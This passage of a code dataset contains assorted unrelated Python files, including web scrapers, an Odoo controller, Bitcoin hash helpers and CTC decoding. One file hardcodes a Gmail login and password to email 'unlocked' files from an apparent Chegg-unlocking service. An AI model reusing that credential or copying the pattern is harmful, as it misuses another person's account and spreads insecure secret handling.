iframe = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.ID,'ifmForm1'))\n )\n driver.switch_to.frame(iframe)\n driver.find_element_by_id(\"t_AccountID\").send_keys(\"\")\n driver.find_element_by_id(\"t_Password\").send_keys(\"\")\n driver.find_element_by_id(\"btn_login\").click()\n print (\"login success\")\nexcept TimeoutException:\n print('time out')\nfinally:\n print('finish')\n #選擇帳號\n\n\ntry:\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.ID, \"ddl_service_account\"))\n )\n select = Select(driver.find_element_by_id('ddl_service_account'))\n select.select_by_index(1)\n driver.find_element_by_id(\"btn_send_service_account\").click()\nexcept TimeoutException:\n print('time out')\n\n#plant\ntime.sleep(5)\ndriver.get(\"https://event.beanfun.com/mabinogi/E20180517/Potted.aspx\")\ndriver.find_element_by_id(\"p02\").click()\n\n","sub_path":"sium/acivity13.py","file_name":"acivity13.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"202385773","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import http\nfrom odoo.http import request\nfrom odoo.addons.website_mail.controllers.main import WebsiteMail\n\n\nclass WebsiteMail(WebsiteMail):\n\n @http.route(['/website_mail/post/json'], type='json', auth='public', website=True)\n def chatter_json(self, res_model='', res_id=None, message='', **kw):\n \"\"\"get reviews from website products\"\"\"\n params = kw.copy()\n msg_data = super(WebsiteMail, self).chatter_json(\n res_model=res_model, res_id=res_id, message=message, **params)\n res_user = request.env['res.users'].search(\n [('name', '=', msg_data.get('author'))])\n product = request.env['product.template'].browse(res_id)\n rating = float(kw.get('rating')) if kw.get('rating') else 0\n # store data from website at product backend\n request.env['customer.review'].sudo().create({\n 'customer_id': res_user.id,\n 'name': message,\n 'date': msg_data.get('date'),\n 'email': res_user.partner_id.email,\n 'product_id': product.id,\n 'rating': rating,\n })\n return msg_data\n","sub_path":"product_rating_review/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"343427164","text":"import atexit\nimport signal,sys\nimport numpy as np\nfrom time import time,sleep\nfrom functools import partial\nfrom kusanagi.ghost.algorithms.PILCO import PILCO\nfrom kusanagi.shell.plant import SerialPlant, LivePlot\nfrom kusanagi.shell.cartpole import CartpoleDraw\nfrom kusanagi.ghost.control import RBFPolicy\nfrom kusanagi.utils import gTrig_np\n\nif __name__ == '__main__':\n #np.random.seed(31337)\n np.set_printoptions(linewidth=500)\n # initliaze plant\n dt = 0.1 # simulation time step\n model_parameters ={} # simulation parameters\n model_parameters['l'] = 0.5\n model_parameters['m'] = 0.5\n model_parameters['M'] = 0.5\n model_parameters['b'] = 0.1\n model_parameters['g'] = 9.82\n x0 = [0,0,0,0] # initial state mean\n S0 = np.eye(4)*(0.1**2) # initial state covariance\n maxU = [10]\n measurement_noise = np.diag(np.ones(len(x0))*0.01**2) # model measurement noise (randomizes the output of the plant)\n plant = SerialPlant(model_parameters,x0,S0,dt,measurement_noise,state_indices=[0,2,3,1],maxU=maxU,baud_rate=4000000,port='/dev/ttyACM0')\n plot = LivePlot(plant,0.001,H=5,angi=[0,3])\n draw_cp = CartpoleDraw(plant,0.001) # initializes visualization\n plot.start()\n draw_cp.start()\n \n atexit.register(plant.stop)\n atexit.register(plot.stop)\n atexit.register(draw_cp.stop)\n\n w = 2*np.pi*0.5;\n A = 10;\n plant.reset_state()\n while True:\n exec_time = time()\n #u_t = A*w*np.cos(w*(time()+0.5*dt))[None]\n u_t = A*np.cos(w*time())[None]\n #if u_t >= 0:\n # u_t[0] = A\n #else:\n # u_t[0] = -A\n plant.apply_control(u_t)\n plant.step()\n #print plant.get_plant_state()\n exec_time = time() - exec_time\n sleep(max(dt-exec_time,0))\n\n","sub_path":"test/test_serial_plant.py","file_name":"test_serial_plant.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"249709310","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom smtplib import SMTP_SSL\r\nfrom email.mime.multipart import MIMEMultipart \r\nfrom email.mime.text import MIMEText \r\nimport sys\r\nimport os\r\n\r\n\r\ndef send_mail(code, url, receiver, download_dir, filename):\r\n\r\n host_server = 'smtp.gmail.com'\r\n port = 465\r\n\r\n sender = 'chegghero.service@gmail.com'\r\n pwd = 'Unlock2018'\r\n \r\n subject = 'CheggHero Unlock File! (NO REPLY)' # email subject\r\n\r\n # 文字内容 \r\n text = '''\r\n Dear!\r\n \r\n Here is the file you wanted. Thanks for your coming!\r\n '''\r\n text = text + \"\\nYour activation code is: \" + code\r\n text = text + \"\\nYour file URL is: \" + url\r\n\r\n msg = MIMEMultipart('mixed') \r\n text_plain = MIMEText(text, 'plain', 'utf-8')\r\n msg.attach(text_plain) \r\n\r\n # 构造附件\r\n full_dir = os.path.join(download_dir, filename)\r\n file_contend = open(full_dir, 'rb').read()\r\n text_att = MIMEText(file_contend, 'base64', 'utf-8')\r\n text_att[\"Content-Type\"] = 'application/octet-stream' \r\n # 以下附件可以重命名成aaa.txt\r\n # text_att[\"Content-Disposition\"] = 'attachment; filename=\"aaa.txt\"'\r\n # 另一种实现方式\r\n text_att.add_header('Content-Disposition', 'attachment', filename=filename)\r\n # 以下中文测试不ok\r\n # text_att[\"Content-Disposition\"] = u'attachment; filename=\"中文附件.txt\"'.decode('utf-8')\r\n msg.attach(text_att) \r\n \r\n msg['Subject'] = subject\r\n msg[\"From\"] = sender # 发送者邮箱地址\r\n msg[\"To\"] = receiver # 接收者邮件地址\r\n\r\n smtp = SMTP_SSL(host_server, port) # SSL 加密连接\r\n # smtp.set_debuglevel(0) # set_debuglevel()是用来调试的。参数值为1表示开启调试模式,参数值为0关闭调试模式\r\n smtp.ehlo(host_server) # 连接服务器\r\n smtp.login(sender, pwd) # 邮箱登录\r\n \r\n try:\r\n smtp.sendmail(sender, receiver, msg.as_string()) # 发送邮件函数\r\n print(\"Successfully Send to \" + receiver) # 输出成功标志\r\n smtp.quit()\r\n return True\r\n except Exception as e:\r\n print(e)\r\n print(\"The sever is busy, please continue later.\")\r\n smtp.quit()\r\n return False\r\n\r\n\r\ndef main(code, url, receiver):\r\n try:\r\n work_dir = os.getcwd()\r\n download_dir = os.path.join(work_dir, \"download_file\", code)\r\n filelist = os.listdir(download_dir)\r\n\r\n if not filelist:\r\n return False\r\n\r\n filename = filelist[0]\r\n return send_mail(code, url, receiver, download_dir, filename) # 发送邮件\r\n # sys.exit(0)\r\n except Exception as e:\r\n print(e)\r\n print(\"Auto email failed\")\r\n return False","sub_path":"CheggHero/unlock/Autoemail.py","file_name":"Autoemail.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"170110190","text":"import re\nimport os\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.support.ui import WebDriverWait\t\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom selenium.common.exceptions import NoSuchElementException\nimport json\nimport pandas as pd\nimport datetime\n\nfrom urllib.request import urlretrieve\n\ndef scrape_site(start_url):\n\tbrowser.webdriver.Firefox()\n\tbrowser.get(start_url)\n\ndef scrape_page(url):\n\n\t# Load page, click 'load more', reload page, until 'load more' isn't clickable\n\t# Can also try loading with page = 20\n\t# Get Items By XPath\n\n\tbrowser = webdriver.Firefox()\n\tbrowser.get(url)\n\n\tbrowser.wait = WebDriverWait(browser, 15)\n\telement = browser.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'product-info')))\n\n\ttotal_items_str = browser.find_element_by_xpath('/html/body/div[5]/div/div[3]/div/div[3]/div[2]/div[2]/div[2]/div').text\n\n\ttotal_items = int(total_items_str[0:3])\n\n\ttitles = []\n\tprices = []\n\turls = []\n\timage_urls = []\n\timage_refs = []\n\n\tdef title_counter(num):\n\t\tif(num>1):\n\t\t\treturn('['+str(num)+']')\n\t\telse:\n\t\t\treturn(\"\")\n\n\tdef item_counter(num):\n\t\tif(num%60)==0:\n\t\t\treturn(1)\n\t\telse:\n\t\t\treturn num%60\n\n\timg_path = 'C:/Users/J/MatchMyLook/Image_Files/Women/Tops/handm'\n\tbase_xpath = '/html/body/div[5]/div/div[3]/div/div[3]/div[2]/div[3]/'\n\n\tbrowser.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\n\tfor i in range(1,(total_items+1)):\n\n\t\titem_cter = item_counter(i)\n\t\tpg_cter = int(i/60)+1\n\t\ttitle_ctr = title_counter(pg_cter)\n\n\t\ttitle = browser.find_element_by_xpath(base_xpath+'div'+title_ctr+'/div['+str(item_cter)+']/div/div[2]/div[1]').text\n\t\ttitles.append(title)\n\t\tprice = browser.find_element_by_xpath(base_xpath+'div['+str(pg_cter)+']/div['+str(item_cter)+']/div/div[2]/div[2]/span').text\n\t\tprices.append(price)\n\t\turl = browser.find_element_by_xpath(base_xpath+'div['+str(pg_cter)+']/div['+str(item_cter)+']/div/a').get_attribute('href')\n\t\turls.append(url)\n\t\timg_url = browser.find_element_by_xpath(base_xpath+'div['+str(pg_cter)+']/div['+str(item_cter)+']/div/div[1]/img[1]').get_attribute('data-src')\n\t\timg_url = img_url.replace(\" \",\"%20\")\n\t\timg_url = \"http:\"+img_url.replace(\"amp;\",\"\")\n\t\timage_urls.append(img_url)\n\t\turlretrieve(img_url, os.path.join(img_path, str(i)+'.jpg'))\n\t\timage_refs.append( os.path.join(img_path, str(i)+'.jpg'))\n\n\treturn_df = pd.DataFrame({\n\t\t'Title':titles,\n\t\t'Price':prices,\n\t\t'Url':urls,\n\t\t'Image_Path':image_refs,},\n\t\t)\n\n\treturn return_df\n\nreturn_df = scrape_page('http://www.hm.com/us/products/ladies/tops?page=22')\nreturn_df.to_csv(\"C:/Users/J/MatchMyLook/Scraping/Data/h_and_m_womens_tops.csv\")","sub_path":"H_and_M/selenium_scraper_h_and_m.py","file_name":"selenium_scraper_h_and_m.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"474546713","text":"#!/usr/bin/env python3\n\n\"\"\"\nPython 3\n Using output from instrument_to_dict.py\n Combine to ESRC format\n\"\"\"\nimport colectica\nimport api\nimport pandas as pd\nimport os\nimport numpy as np\nfrom pandas.io.json import json_normalize\nimport json\n\n\ndef root_to_dict_interviewer_instruction(root):\n \"\"\"\n Part of parse xml, item_type = Interviewer Instruction\n \"\"\"\n info = {}\n info['URN'] = root.find('.//URN').text\n info['UserID'] = root.find('.//UserID').text\n info['InstructionText'] = root.find('.//InstructionText/LiteralText/Text').text\n return info\n\n\ndef item_to_dict(dict_item):\n \"\"\"\n Flat out item in dict_item\n \"\"\"\n info = {}\n item_info = None\n\n for k, v in dict_item.items():\n if k == 'ItemType':\n info[k] = api.item_dict_inv[dict_item['ItemType']]\n elif k == 'Item':\n item_info = colectica.parse_xml(v, api.item_dict_inv[dict_item['ItemType']])\n else:\n info[k] = v\n d = {**info, **item_info}\n return d\n\n\ndef generate_category_dict(category_file):\n \"\"\"\n Generate a dictionary for code category\n \"\"\"\n L = json.load(open(category_file))\n d = {}\n for dict_item in L:\n item = item_to_dict(dict_item)\n if not item['Label'] is None:\n d[item['URN']] = item['Label']\n else:\n d[item['URN']] = ''\n return d\n\n\ndef get_one_study(study_dir):\n \"\"\"\n output for one study\n \"\"\"\n df_columns = ['item_type', 'item_urn', 'content']\n df = pd.DataFrame(columns=df_columns)\n\n # category urn and label\n list_files = os.listdir(study_dir)\n\n instrument_dict = {}\n if 'Instrument.txt' in list_files:\n L = json.load(open(os.path.join(study_dir, 'Instrument.txt')))\n item = item_to_dict(L[0])\n instrument_dict['instrument_urn'] = item['InstrumentURN']\n instrument_dict['instrument_name'] = item['InstrumentName']\n\n if 'Category.txt' in list_files:\n category_dict = generate_category_dict(os.path.join(study_dir, 'Category.txt'))\n else:\n category_dict = []\n\n for input_file in list_files:\n\n filename = os.path.splitext(input_file)[0]\n\n L = json.load(open(os.path.join(study_dir, input_file)))\n\n if filename == 'Question':\n for dict_item in L:\n item = item_to_dict(dict_item)\n if not item['QuestionLiteral'] is None:\n literal = item['QuestionLiteral'].replace('\\n', '')\n else:\n literal = None\n df.loc[len(df)] = ['question', item['QuestionURN'], literal]\n df.loc[len(df)] = ['question name', None, item['QuestionItemName']]\n\n if item['Response'] != {} and item['Response']['response_type'] != 'CodeList':\n df.loc[len(df)] = [item['Response']['response_type'], None, item['Response']['response_label']]\n\n elif filename == 'Interviewer Instruction':\n for dict_item in L:\n item = item_to_dict(dict_item)\n df.loc[len(df)] = ['instruction', item['InstructionURN'], item['InstructionText']]\n\n elif filename == 'Code Set' and category_dict != []:\n for dict_item in L:\n item = item_to_dict(dict_item)\n for code in item['Code']:\n if code['Value'] is None:\n code['Value'] = ''\n cat_urn = 'urn:ddi:' + code['CategoryReference']['Agency'] + ':' + code['CategoryReference']['ID'] + ':' + code['CategoryReference']['Version']\n df.loc[len(df)] = ['codelist', code['URN'], code['Value'] + ', ' + category_dict[cat_urn]]\n\n elif filename == 'Statement':\n for dict_item in L:\n item = item_to_dict(dict_item)\n df.loc[len(df)] = ['statement', item['StatementURN'], item['Literal']]\n\n elif filename == 'Conditional':\n for dict_item in L:\n item = item_to_dict(dict_item)\n df.loc[len(df)] = ['conditional', item['URN'], item['IfCondition']['Description'] + item['IfCondition']['CommandContent'] if not item['IfCondition']['CommandContent'] is None else item['IfCondition']['Description']]\n\n elif filename == 'Loop':\n for dict_item in L:\n item = item_to_dict(dict_item)\n df.loc[len(df)] = ['loop', item['URN'], item['LoopWhile']['CommandContent']]\n\n else:\n # TODO\n print(filename)\n\n df = df.drop_duplicates(keep='first')\n df['instrument_name'] = instrument_dict['instrument_name']\n df['instrument_urn'] = instrument_dict['instrument_urn']\n return df\n\n\ndef main():\n top_dir = 'instrument_dict_original'\n dir_list = [os.path.join(top_dir, o) for o in os.listdir(top_dir) if os.path.isdir(os.path.join(top_dir,o))]\n\n appended_data = []\n for study_dir in dir_list:\n print(study_dir)\n df = get_one_study(study_dir)\n appended_data.append(df)\n\n df_all = pd.concat(appended_data)\n df_all.to_csv('ESRC.csv', sep='\\t', index=False)\n\nif __name__ == '__main__':\n main()\n","sub_path":"ESRC.py","file_name":"ESRC.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"441585019","text":"import firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\n\n# Use a service account\ncred = credentials.Certificate('./config.json')\nfirebase_admin.initialize_app(cred)\n\ndb = firestore.client()\n\ndoc_ref = db.collection(u'ticketreader')\n\n\ndef newTicket(email, cost, flectura, fticket, IVA, NIF, company, wpage, number):\n # data structure for every ticket\n ticketData = {\n u'Correo': email,\n u'Coste': cost,\n u'Fecha Lectura': flectura,\n u'Fecha Ticket': fticket,\n u'IVA': IVA,\n u'NIF': NIF,\n u'Nombre de Empresa': company,\n u'Pagina Web': wpage,\n u'Telefono': number\n }\n\n #all_tickets = [doc.to_dict() for doc in doc_ref.stream()]\n\n doc_ref.add(ticketData)\n\n print(ticketData)\n\n\n\"\"\"\nnewTicket(\"Company D\", \"companyc@company.com\", \"40\", \"01/01/2021\", \"03/04/2020\",\n \"21\", \"ABC1234\", \"Company C\", \"companyc.com\", \"635112260\")\n\"\"\"\n","sub_path":"server/uploadToFirebase.py","file_name":"uploadToFirebase.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"546472386","text":"'''\nhttps://leetcode.com/problems/best-team-with-no-conflicts/\nYou are the manager of a basketball team. For the upcoming tournament, you want to choose the team with the highest overall score. The score of the team is the sum of scores of all the players in the team.\nHowever, the basketball team is not allowed to have conflicts. A conflict exists if a younger player has a strictly higher score than an older player. A conflict does not occur between players of the same age.\nGiven two lists, scores and ages, where each scores[i] and ages[i] represents the score and age of the ith player, respectively, return the highest overall score of all possible basketball teams.\nExample 1:\n\nInput: scores = [1,3,5,10,15], ages = [1,2,3,4,5]\nOutput: 34\nExplanation: You can choose all the players.\nExample 2:\n\nInput: scores = [4,5,6,5], ages = [2,1,2,1]\nOutput: 16\nExplanation: It is best to choose the last 3 players. Notice that you are allowed to choose multiple people of the same age.\nExample 3:\n\nInput: scores = [1,2,3,5], ages = [8,9,10,1]\nOutput: 6\nExplanation: It is best to choose the first 3 players. \n'''\n\n# sort based on age and if age is equal then sort their score\n# return max longest increasing subsequence sum from score array\nclass Solution:\n def bestTeamScore(self, scores: List[int], ages: List[int]):\n \n n = len(scores)\n \n score_arr = [s for a, s in sorted((age, score) for age, score in zip(ages, scores))]\n\n dp = score_arr[:]\n \n for i in range(1, n):\n for j in range(i):\n if score_arr[i] >= score_arr[j]:\n dp[i] = max(dp[i], dp[j] + score_arr[i])\n\n return max(dp)\n \n ","sub_path":"Dynamic Programming/best_team_with_no_conflict.py","file_name":"best_team_with_no_conflict.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"357633186","text":"#!/usr/bin/env python3\n\n# Copyright (C) 2017-2021 The btclib developers\n#\n# This file is part of btclib. It is subject to the license terms in the\n# LICENSE file found in the top-level directory of this distribution.\n#\n# No part of btclib including this file, may be copied, modified, propagated,\n# or distributed except according to the terms contained in the LICENSE file.\n\n\"\"\" Hash based helper functions.\n\n\"\"\"\n\nimport hashlib\nfrom typing import Callable, List, Tuple, Union\n\nfrom btclib.alias import HashF, Octets\nfrom btclib.ecc.curve import Curve, secp256k1\n\n# from btclib.to_pub_key import Key, pub_keyinfo_from_key\nfrom btclib.utils import bytes_from_octets, int_from_bits\n\nH160_Net = Tuple[bytes, str]\n\n\ndef ripemd160(octets: Octets) -> bytes:\n \"Return the RIPEMD160(*) of the input octet sequence.\"\n\n octets = bytes_from_octets(octets)\n return hashlib.new(\"ripemd160\", octets).digest()\n\n\ndef sha256(octets: Octets) -> bytes:\n \"Return the SHA256(*) of the input octet sequence.\"\n\n octets = bytes_from_octets(octets)\n return hashlib.sha256(octets).digest()\n\n\ndef hash160(octets: Octets) -> bytes:\n \"Return the HASH160=RIPEMD160(SHA256) of the input octet sequence.\"\n\n return ripemd160(sha256(octets))\n\n\ndef hash256(octets: Octets) -> bytes:\n \"Return the SHA256(SHA256(*)) of the input octet sequence.\"\n\n return sha256(sha256(octets))\n\n\ndef reduce_to_hlen(msg: Octets, hf: HashF = hashlib.sha256) -> bytes:\n\n msg = bytes_from_octets(msg)\n # Step 4 of SEC 1 v.2 section 4.1.3\n h = hf()\n h.update(msg)\n return h.digest()\n\n\ndef magic_message(msg: Octets) -> bytes:\n\n msg = bytes_from_octets(msg)\n t = (\n b\"\\x18Bitcoin Signed Message:\\n\"\n + len(msg).to_bytes(1, byteorder=\"big\", signed=False)\n + msg\n )\n return sha256(t)\n\n\n# FIXME move into ecc folder\ndef challenge_(\n msg_hash: Octets, ec: Curve = secp256k1, hf: HashF = hashlib.sha256\n) -> int:\n\n # the message msg_hash: a hf_len array\n hf_len = hf().digest_size\n msg_hash = bytes_from_octets(msg_hash, hf_len)\n\n # leftmost ec.nlen bits %= ec.n\n return int_from_bits(msg_hash, ec.nlen) % ec.n\n\n\ndef merkle_root(data: List[bytes], hf: Callable[[Union[bytes, str]], bytes]) -> bytes:\n \"\"\"Return the Merkel tree root of a list of binary hashes.\n\n The Merkel tree is a binary tree constructed\n with the provided list of binary data as bottom level,\n then recursively going up one level\n by hashing every hash value pair in the current level,\n until a single value (root) is obtained.\n \"\"\"\n\n data = [hf(item) for item in data]\n while len(data) != 1:\n parent_level = []\n if len(data) % 2:\n data.append(data[-1])\n for i in range(0, len(data), 2):\n parent = hf(data[i] + data[i + 1])\n parent_level.append(parent)\n data = parent_level[:]\n return data[0]\n\n\ndef tagged_hash(tag: bytes, m: bytes, hf: HashF = hashlib.sha256) -> bytes:\n\n h1 = hf()\n h1.update(tag)\n tag_hash = h1.digest()\n\n h2 = hf()\n h2.update(tag_hash + tag_hash)\n\n # it could be sped up by storing the above midstate\n\n h2.update(m)\n return h2.digest()\n","sub_path":"btclib/hashes.py","file_name":"hashes.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"511185973","text":"# from sklearn.feature_extraction.text import TfidfVectorizer\n# from nltk.stem.porter import PorterStemmer\n#\n#\n#\n#\n#\n# if __name__ == '__main__':\n# FILEPATH = '../data/raw.txt'\n# with open(FILEPATH) as f:\n# vizer = TfidfVectorizer(strip_accents='unicode', stop_words='english')\n# frequency_matrix = vizer.fit_transform(f).astype(float)\n# # for i in sorted([(key,val) for (key, val) in vizer.vocabulary_.items()]):\n# # print(i)\n#\n# frequency_matrix = sorted([(key,val) for (key, val) in vizer.vocabulary_.items()], key=lambda x,y:x)\n# for i in frequency_matrix:\n# print(i[0])\n# stemmer_porter = PorterStemmer()\n# # tokens_stemporter = [''.join(list(map(stemmer_porter.stem, sent[0]))) for sent in frequency_matrix]\n# # for i in tokens_stemporter:\n# # print(i)\n\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n\ndef main():\n # Some code was used from https://gist.github.com/StevenMaude/ea46edc315b0f94d03b9\n vectorizer = TfidfVectorizer(input='content', max_features=200,\n token_pattern='(?u)\\\\b[a-zA-Z]\\\\w{2,}\\\\b',\n stop_words='english', ngram_range=(1, 3))\n with open('../data/test/raw.txt') as f:\n vect = vectorizer.fit_transform(f)\n\n scores = zip(vectorizer.get_feature_names(),\n np.asarray(vect.sum(axis=0)).ravel())\n sorted_scores = sorted(scores, key=lambda x: x[1], reverse=True)\n for item in sorted_scores:\n print(item)\n\n\n\n\nif __name__ == '__main__':\n\n main()\n","sub_path":"src/vectorize.py","file_name":"vectorize.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"90020267","text":"'''\nImplementations of CTC decoding for PoreOver\n\nThis version does not collapse repeated characters so is only valid if the model\nhas been trained with ctc_merge_repeated=False.\n'''\n\nimport numpy as np\nimport operator\nfrom collections import OrderedDict\n\n# Default alphabet\nDNA_alphabet = OrderedDict([('A',0),('C',1),('G',2),('T',3)])\n\ndef remove_gaps(a):\n # only needed for greedy decoding\n # unlike standard CTC, does not remove repeated characters\n label = ''\n for i in a:\n if i != '-':\n label += i\n return(label)\n\ndef greedy_search(logits, alphabet=['A','C','G','T','-']):\n # take highest probability label at each step\n argmax_ = np.argmax(logits, axis=1)\n chars_ = np.take(alphabet, argmax_)\n return(remove_gaps(chars_))\n\ndef forward(l,y):\n t_max = len(y)\n s_max = len(l)\n\n # fw[t][s] is forward probability of the labeling_{1:s} at time t\n fw = np.zeros((t_max,s_max))\n\n # fw[-1,-1] = 1 and fw[-1, *] = 0 fw[*,-1] = product of gap probabilites\n for t in range(t_max):\n for s in range(s_max):\n if t==0 and s==0:\n fw[t,s] = y[t,l[s]]\n elif t==0 and s>0:\n fw[t,s] = 0\n elif s==0:\n fw[t,s] = y[t,-1]*fw[t-1,s] + y[t,l[s]]*np.product(y[:t,-1])\n else:\n fw[t,s] = y[t,-1]*fw[t-1,s] + y[t,l[s]]*fw[t-1,s-1]\n\n return(fw)\n\n\n# return augmented forward matrix with extra column\ndef forward_add_column(fw, y, l):\n #print('Adding column for label',l,fw)\n t_max = len(y)\n s_max = len(l)\n\n fw_ = np.zeros((t_max,s_max))\n fw_[:,:-1] = fw\n\n s = s_max - 1\n for t in range(t_max):\n if t==0 and s==0:\n fw_[t,s] = y[t,l[s]]\n elif t==0 and s>0:\n fw_[t,s] = 0\n elif s==0:\n fw_[t,s] = y[t,-1]*fw_[t-1,s] + y[t,l[s]]*np.product(y[:t,-1])\n else:\n fw_[t,s] = y[t,-1]*fw_[t-1,s] + y[t,l[s]]*fw_[t-1,s-1]\n return(fw_)\n\n# return prefix probability from the forward matrix\ndef forward_prefix_prob(fw,y,k):\n if len(k) > 1:\n prefix_prob_ = 0\n for t in range(len(y)):\n if t==0:\n prefix_prob_ += 0\n else:\n prefix_prob_ += y[t,k[-1]]*fw[t-1,-2]\n else:\n prefix_prob_ = np.sum([y[t,k[-1]]*np.product(y[:t,-1]) for t in range(len(y))])\n return(prefix_prob_)\n\ndef prefix_search(y, alphabet=OrderedDict([('A',0),('C',1),('G',2),('T',3)]),return_forward=False, return_search=False):\n # y: np array of softmax probabilities\n # alphabet: ordered dict of label to index\n\n stop_search = False\n search_level = 0\n\n gap_prob = np.product(y[:,-1])\n label_prob = {'':gap_prob}\n\n top_label = ''\n top_label_prob = 0\n top_label_fw = np.array([])\n\n curr_label = ''\n curr_label_fw = np.array([])\n\n search_intermediates = []\n\n while not stop_search:\n #print('Level:',search_level, 'Top Hit:',top_label, 'Label Probability:',label_prob[top_label])\n #print('Current Label:',curr_label)\n\n prefix_prob = {}\n prefix_fw = []\n\n for c in alphabet:\n prefix = curr_label + c\n prefix_int = [alphabet[i] for i in prefix]\n\n if search_level == 0:\n prefix_fw.append(forward(prefix_int,y))\n else:\n prefix_fw.append(forward_add_column(curr_label_fw, y, prefix_int))\n\n label_prob[prefix] = prefix_fw[-1][-1,-1]\n if label_prob[prefix] > top_label_prob:\n top_label = prefix\n top_label_prob = label_prob[prefix]\n top_label_fw = prefix_fw[-1]\n\n prefix_prob[prefix] = forward_prefix_prob(prefix_fw[-1], y, prefix_int)\n #print('extending by prefix:',c, 'Prefix Probability:',prefix_prob[prefix], 'Label probability:',label_prob[prefix])\n\n # get best prefix probability\n best_prefix = max(prefix_prob.items(), key=operator.itemgetter(1))[0]\n\n search_intermediates.append([ (p,prefix_prob[p],label_prob[p]) for p in sorted(prefix_prob.keys())])\n\n if prefix_prob[best_prefix] < top_label_prob:\n stop_search = True\n else:\n # get highest probability label\n #top_label = max(label_prob.items(), key=operator.itemgetter(1))[0]\n # top_label should be set each iteration, along with top_fw\n\n # move to prefix with highest label probability\n curr_label = max(prefix_prob.items(), key=operator.itemgetter(1))[0]\n curr_label_fw = prefix_fw[alphabet[curr_label[-1]]]\n\n search_level += 1\n\n #print(\"Search finished! Top label is\",top_label, label_prob[top_label])\n if return_forward:\n if return_search:\n return(top_label, top_label_fw, search_intermediates)\n else:\n return(top_label, top_label_fw)\n else:\n return(top_label, label_prob[top_label])\n","sub_path":"decoding/archive/ctc.py","file_name":"ctc.py","file_ext":"py","file_size_in_byte":4922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"302417079","text":"from app import app, support\nfrom flask import render_template, flash, redirect, url_for\nfrom app.forms import LoginForm\nfrom app.models import User, Post\n\nfrom flask_login import current_user, login_user, logout_user\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n posts = Post.get(is_active=True, limit=5)\n for post in posts:\n post.body = support.first_paragraph(post.body)\n return render_template('index.html', posts=posts)\n\n\n@app.route('/mypanel', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.get_first(username=form.username.data)\n if user is None or not user.check_password(form.password.data):\n flash('Неверный логин или пароль', 'alert')\n return redirect(url_for('login'))\n login_user(user, remember=form.remember_me.data)\n flash('Вход выполнен успешно', 'success')\n return redirect(url_for('index'))\n return render_template('login.html', form=form)\n\n\n@app.route('/logout')\ndef logout():\n if current_user.is_authenticated and logout_user():\n flash('Выход выполнен успешно', 'success')\n return redirect(url_for('index'))\n\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"185527397","text":"import json\n\nfrom django.http import JsonResponse\n\nfrom contest.auth import admin_required\nfrom contest.models.contest import Contest\nfrom contest.models.problem import Problem\n\n\n@admin_required\ndef deleteContest(request, *args, **kwargs):\n id = request.POST['id']\n Contest.get(id).delete()\n return JsonResponse(\"ok\", safe=False)\n\n\n@admin_required\ndef createContest(request):\n \"\"\"POSTing a freshly-created contest redirects here courtesy of script.js.\"\"\"\n id = request.POST.get(\"id\")\n contest = Contest.get(id) or Contest()\n\n contest.name = request.POST.get(\"name\")\n contest.start = int(request.POST.get(\"start\"))\n contest.end = int(request.POST.get(\"end\"))\n contest.scoreboardOff = int(request.POST.get(\"scoreboardOff\"))\n contest.showProblInfoBlocks = request.POST.get(\"showProblInfoBlocks\")\n contest.problems = [Problem.get(id) for id in json.loads(request.POST.get(\"problems\"))]\n if str(request.POST.get(\"tieBreaker\")).lower() == \"true\":\n contest.tieBreaker = True\n else:\n contest.tieBreaker = False\n\n # True if \"displayFullname\" == \"true\"\n contest.displayFullname = str(request.POST.get(\"displayFullname\")).lower() == \"true\"\n \n\n contest.save()\n\n return JsonResponse(contest.id, safe=False)\n","sub_path":"opencontest/contest/views/contests.py","file_name":"contests.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"106405046","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nEd Mountjoy (June 2018)\n\nFormats the output of bedtools into final format for loading\n'''\n\nimport 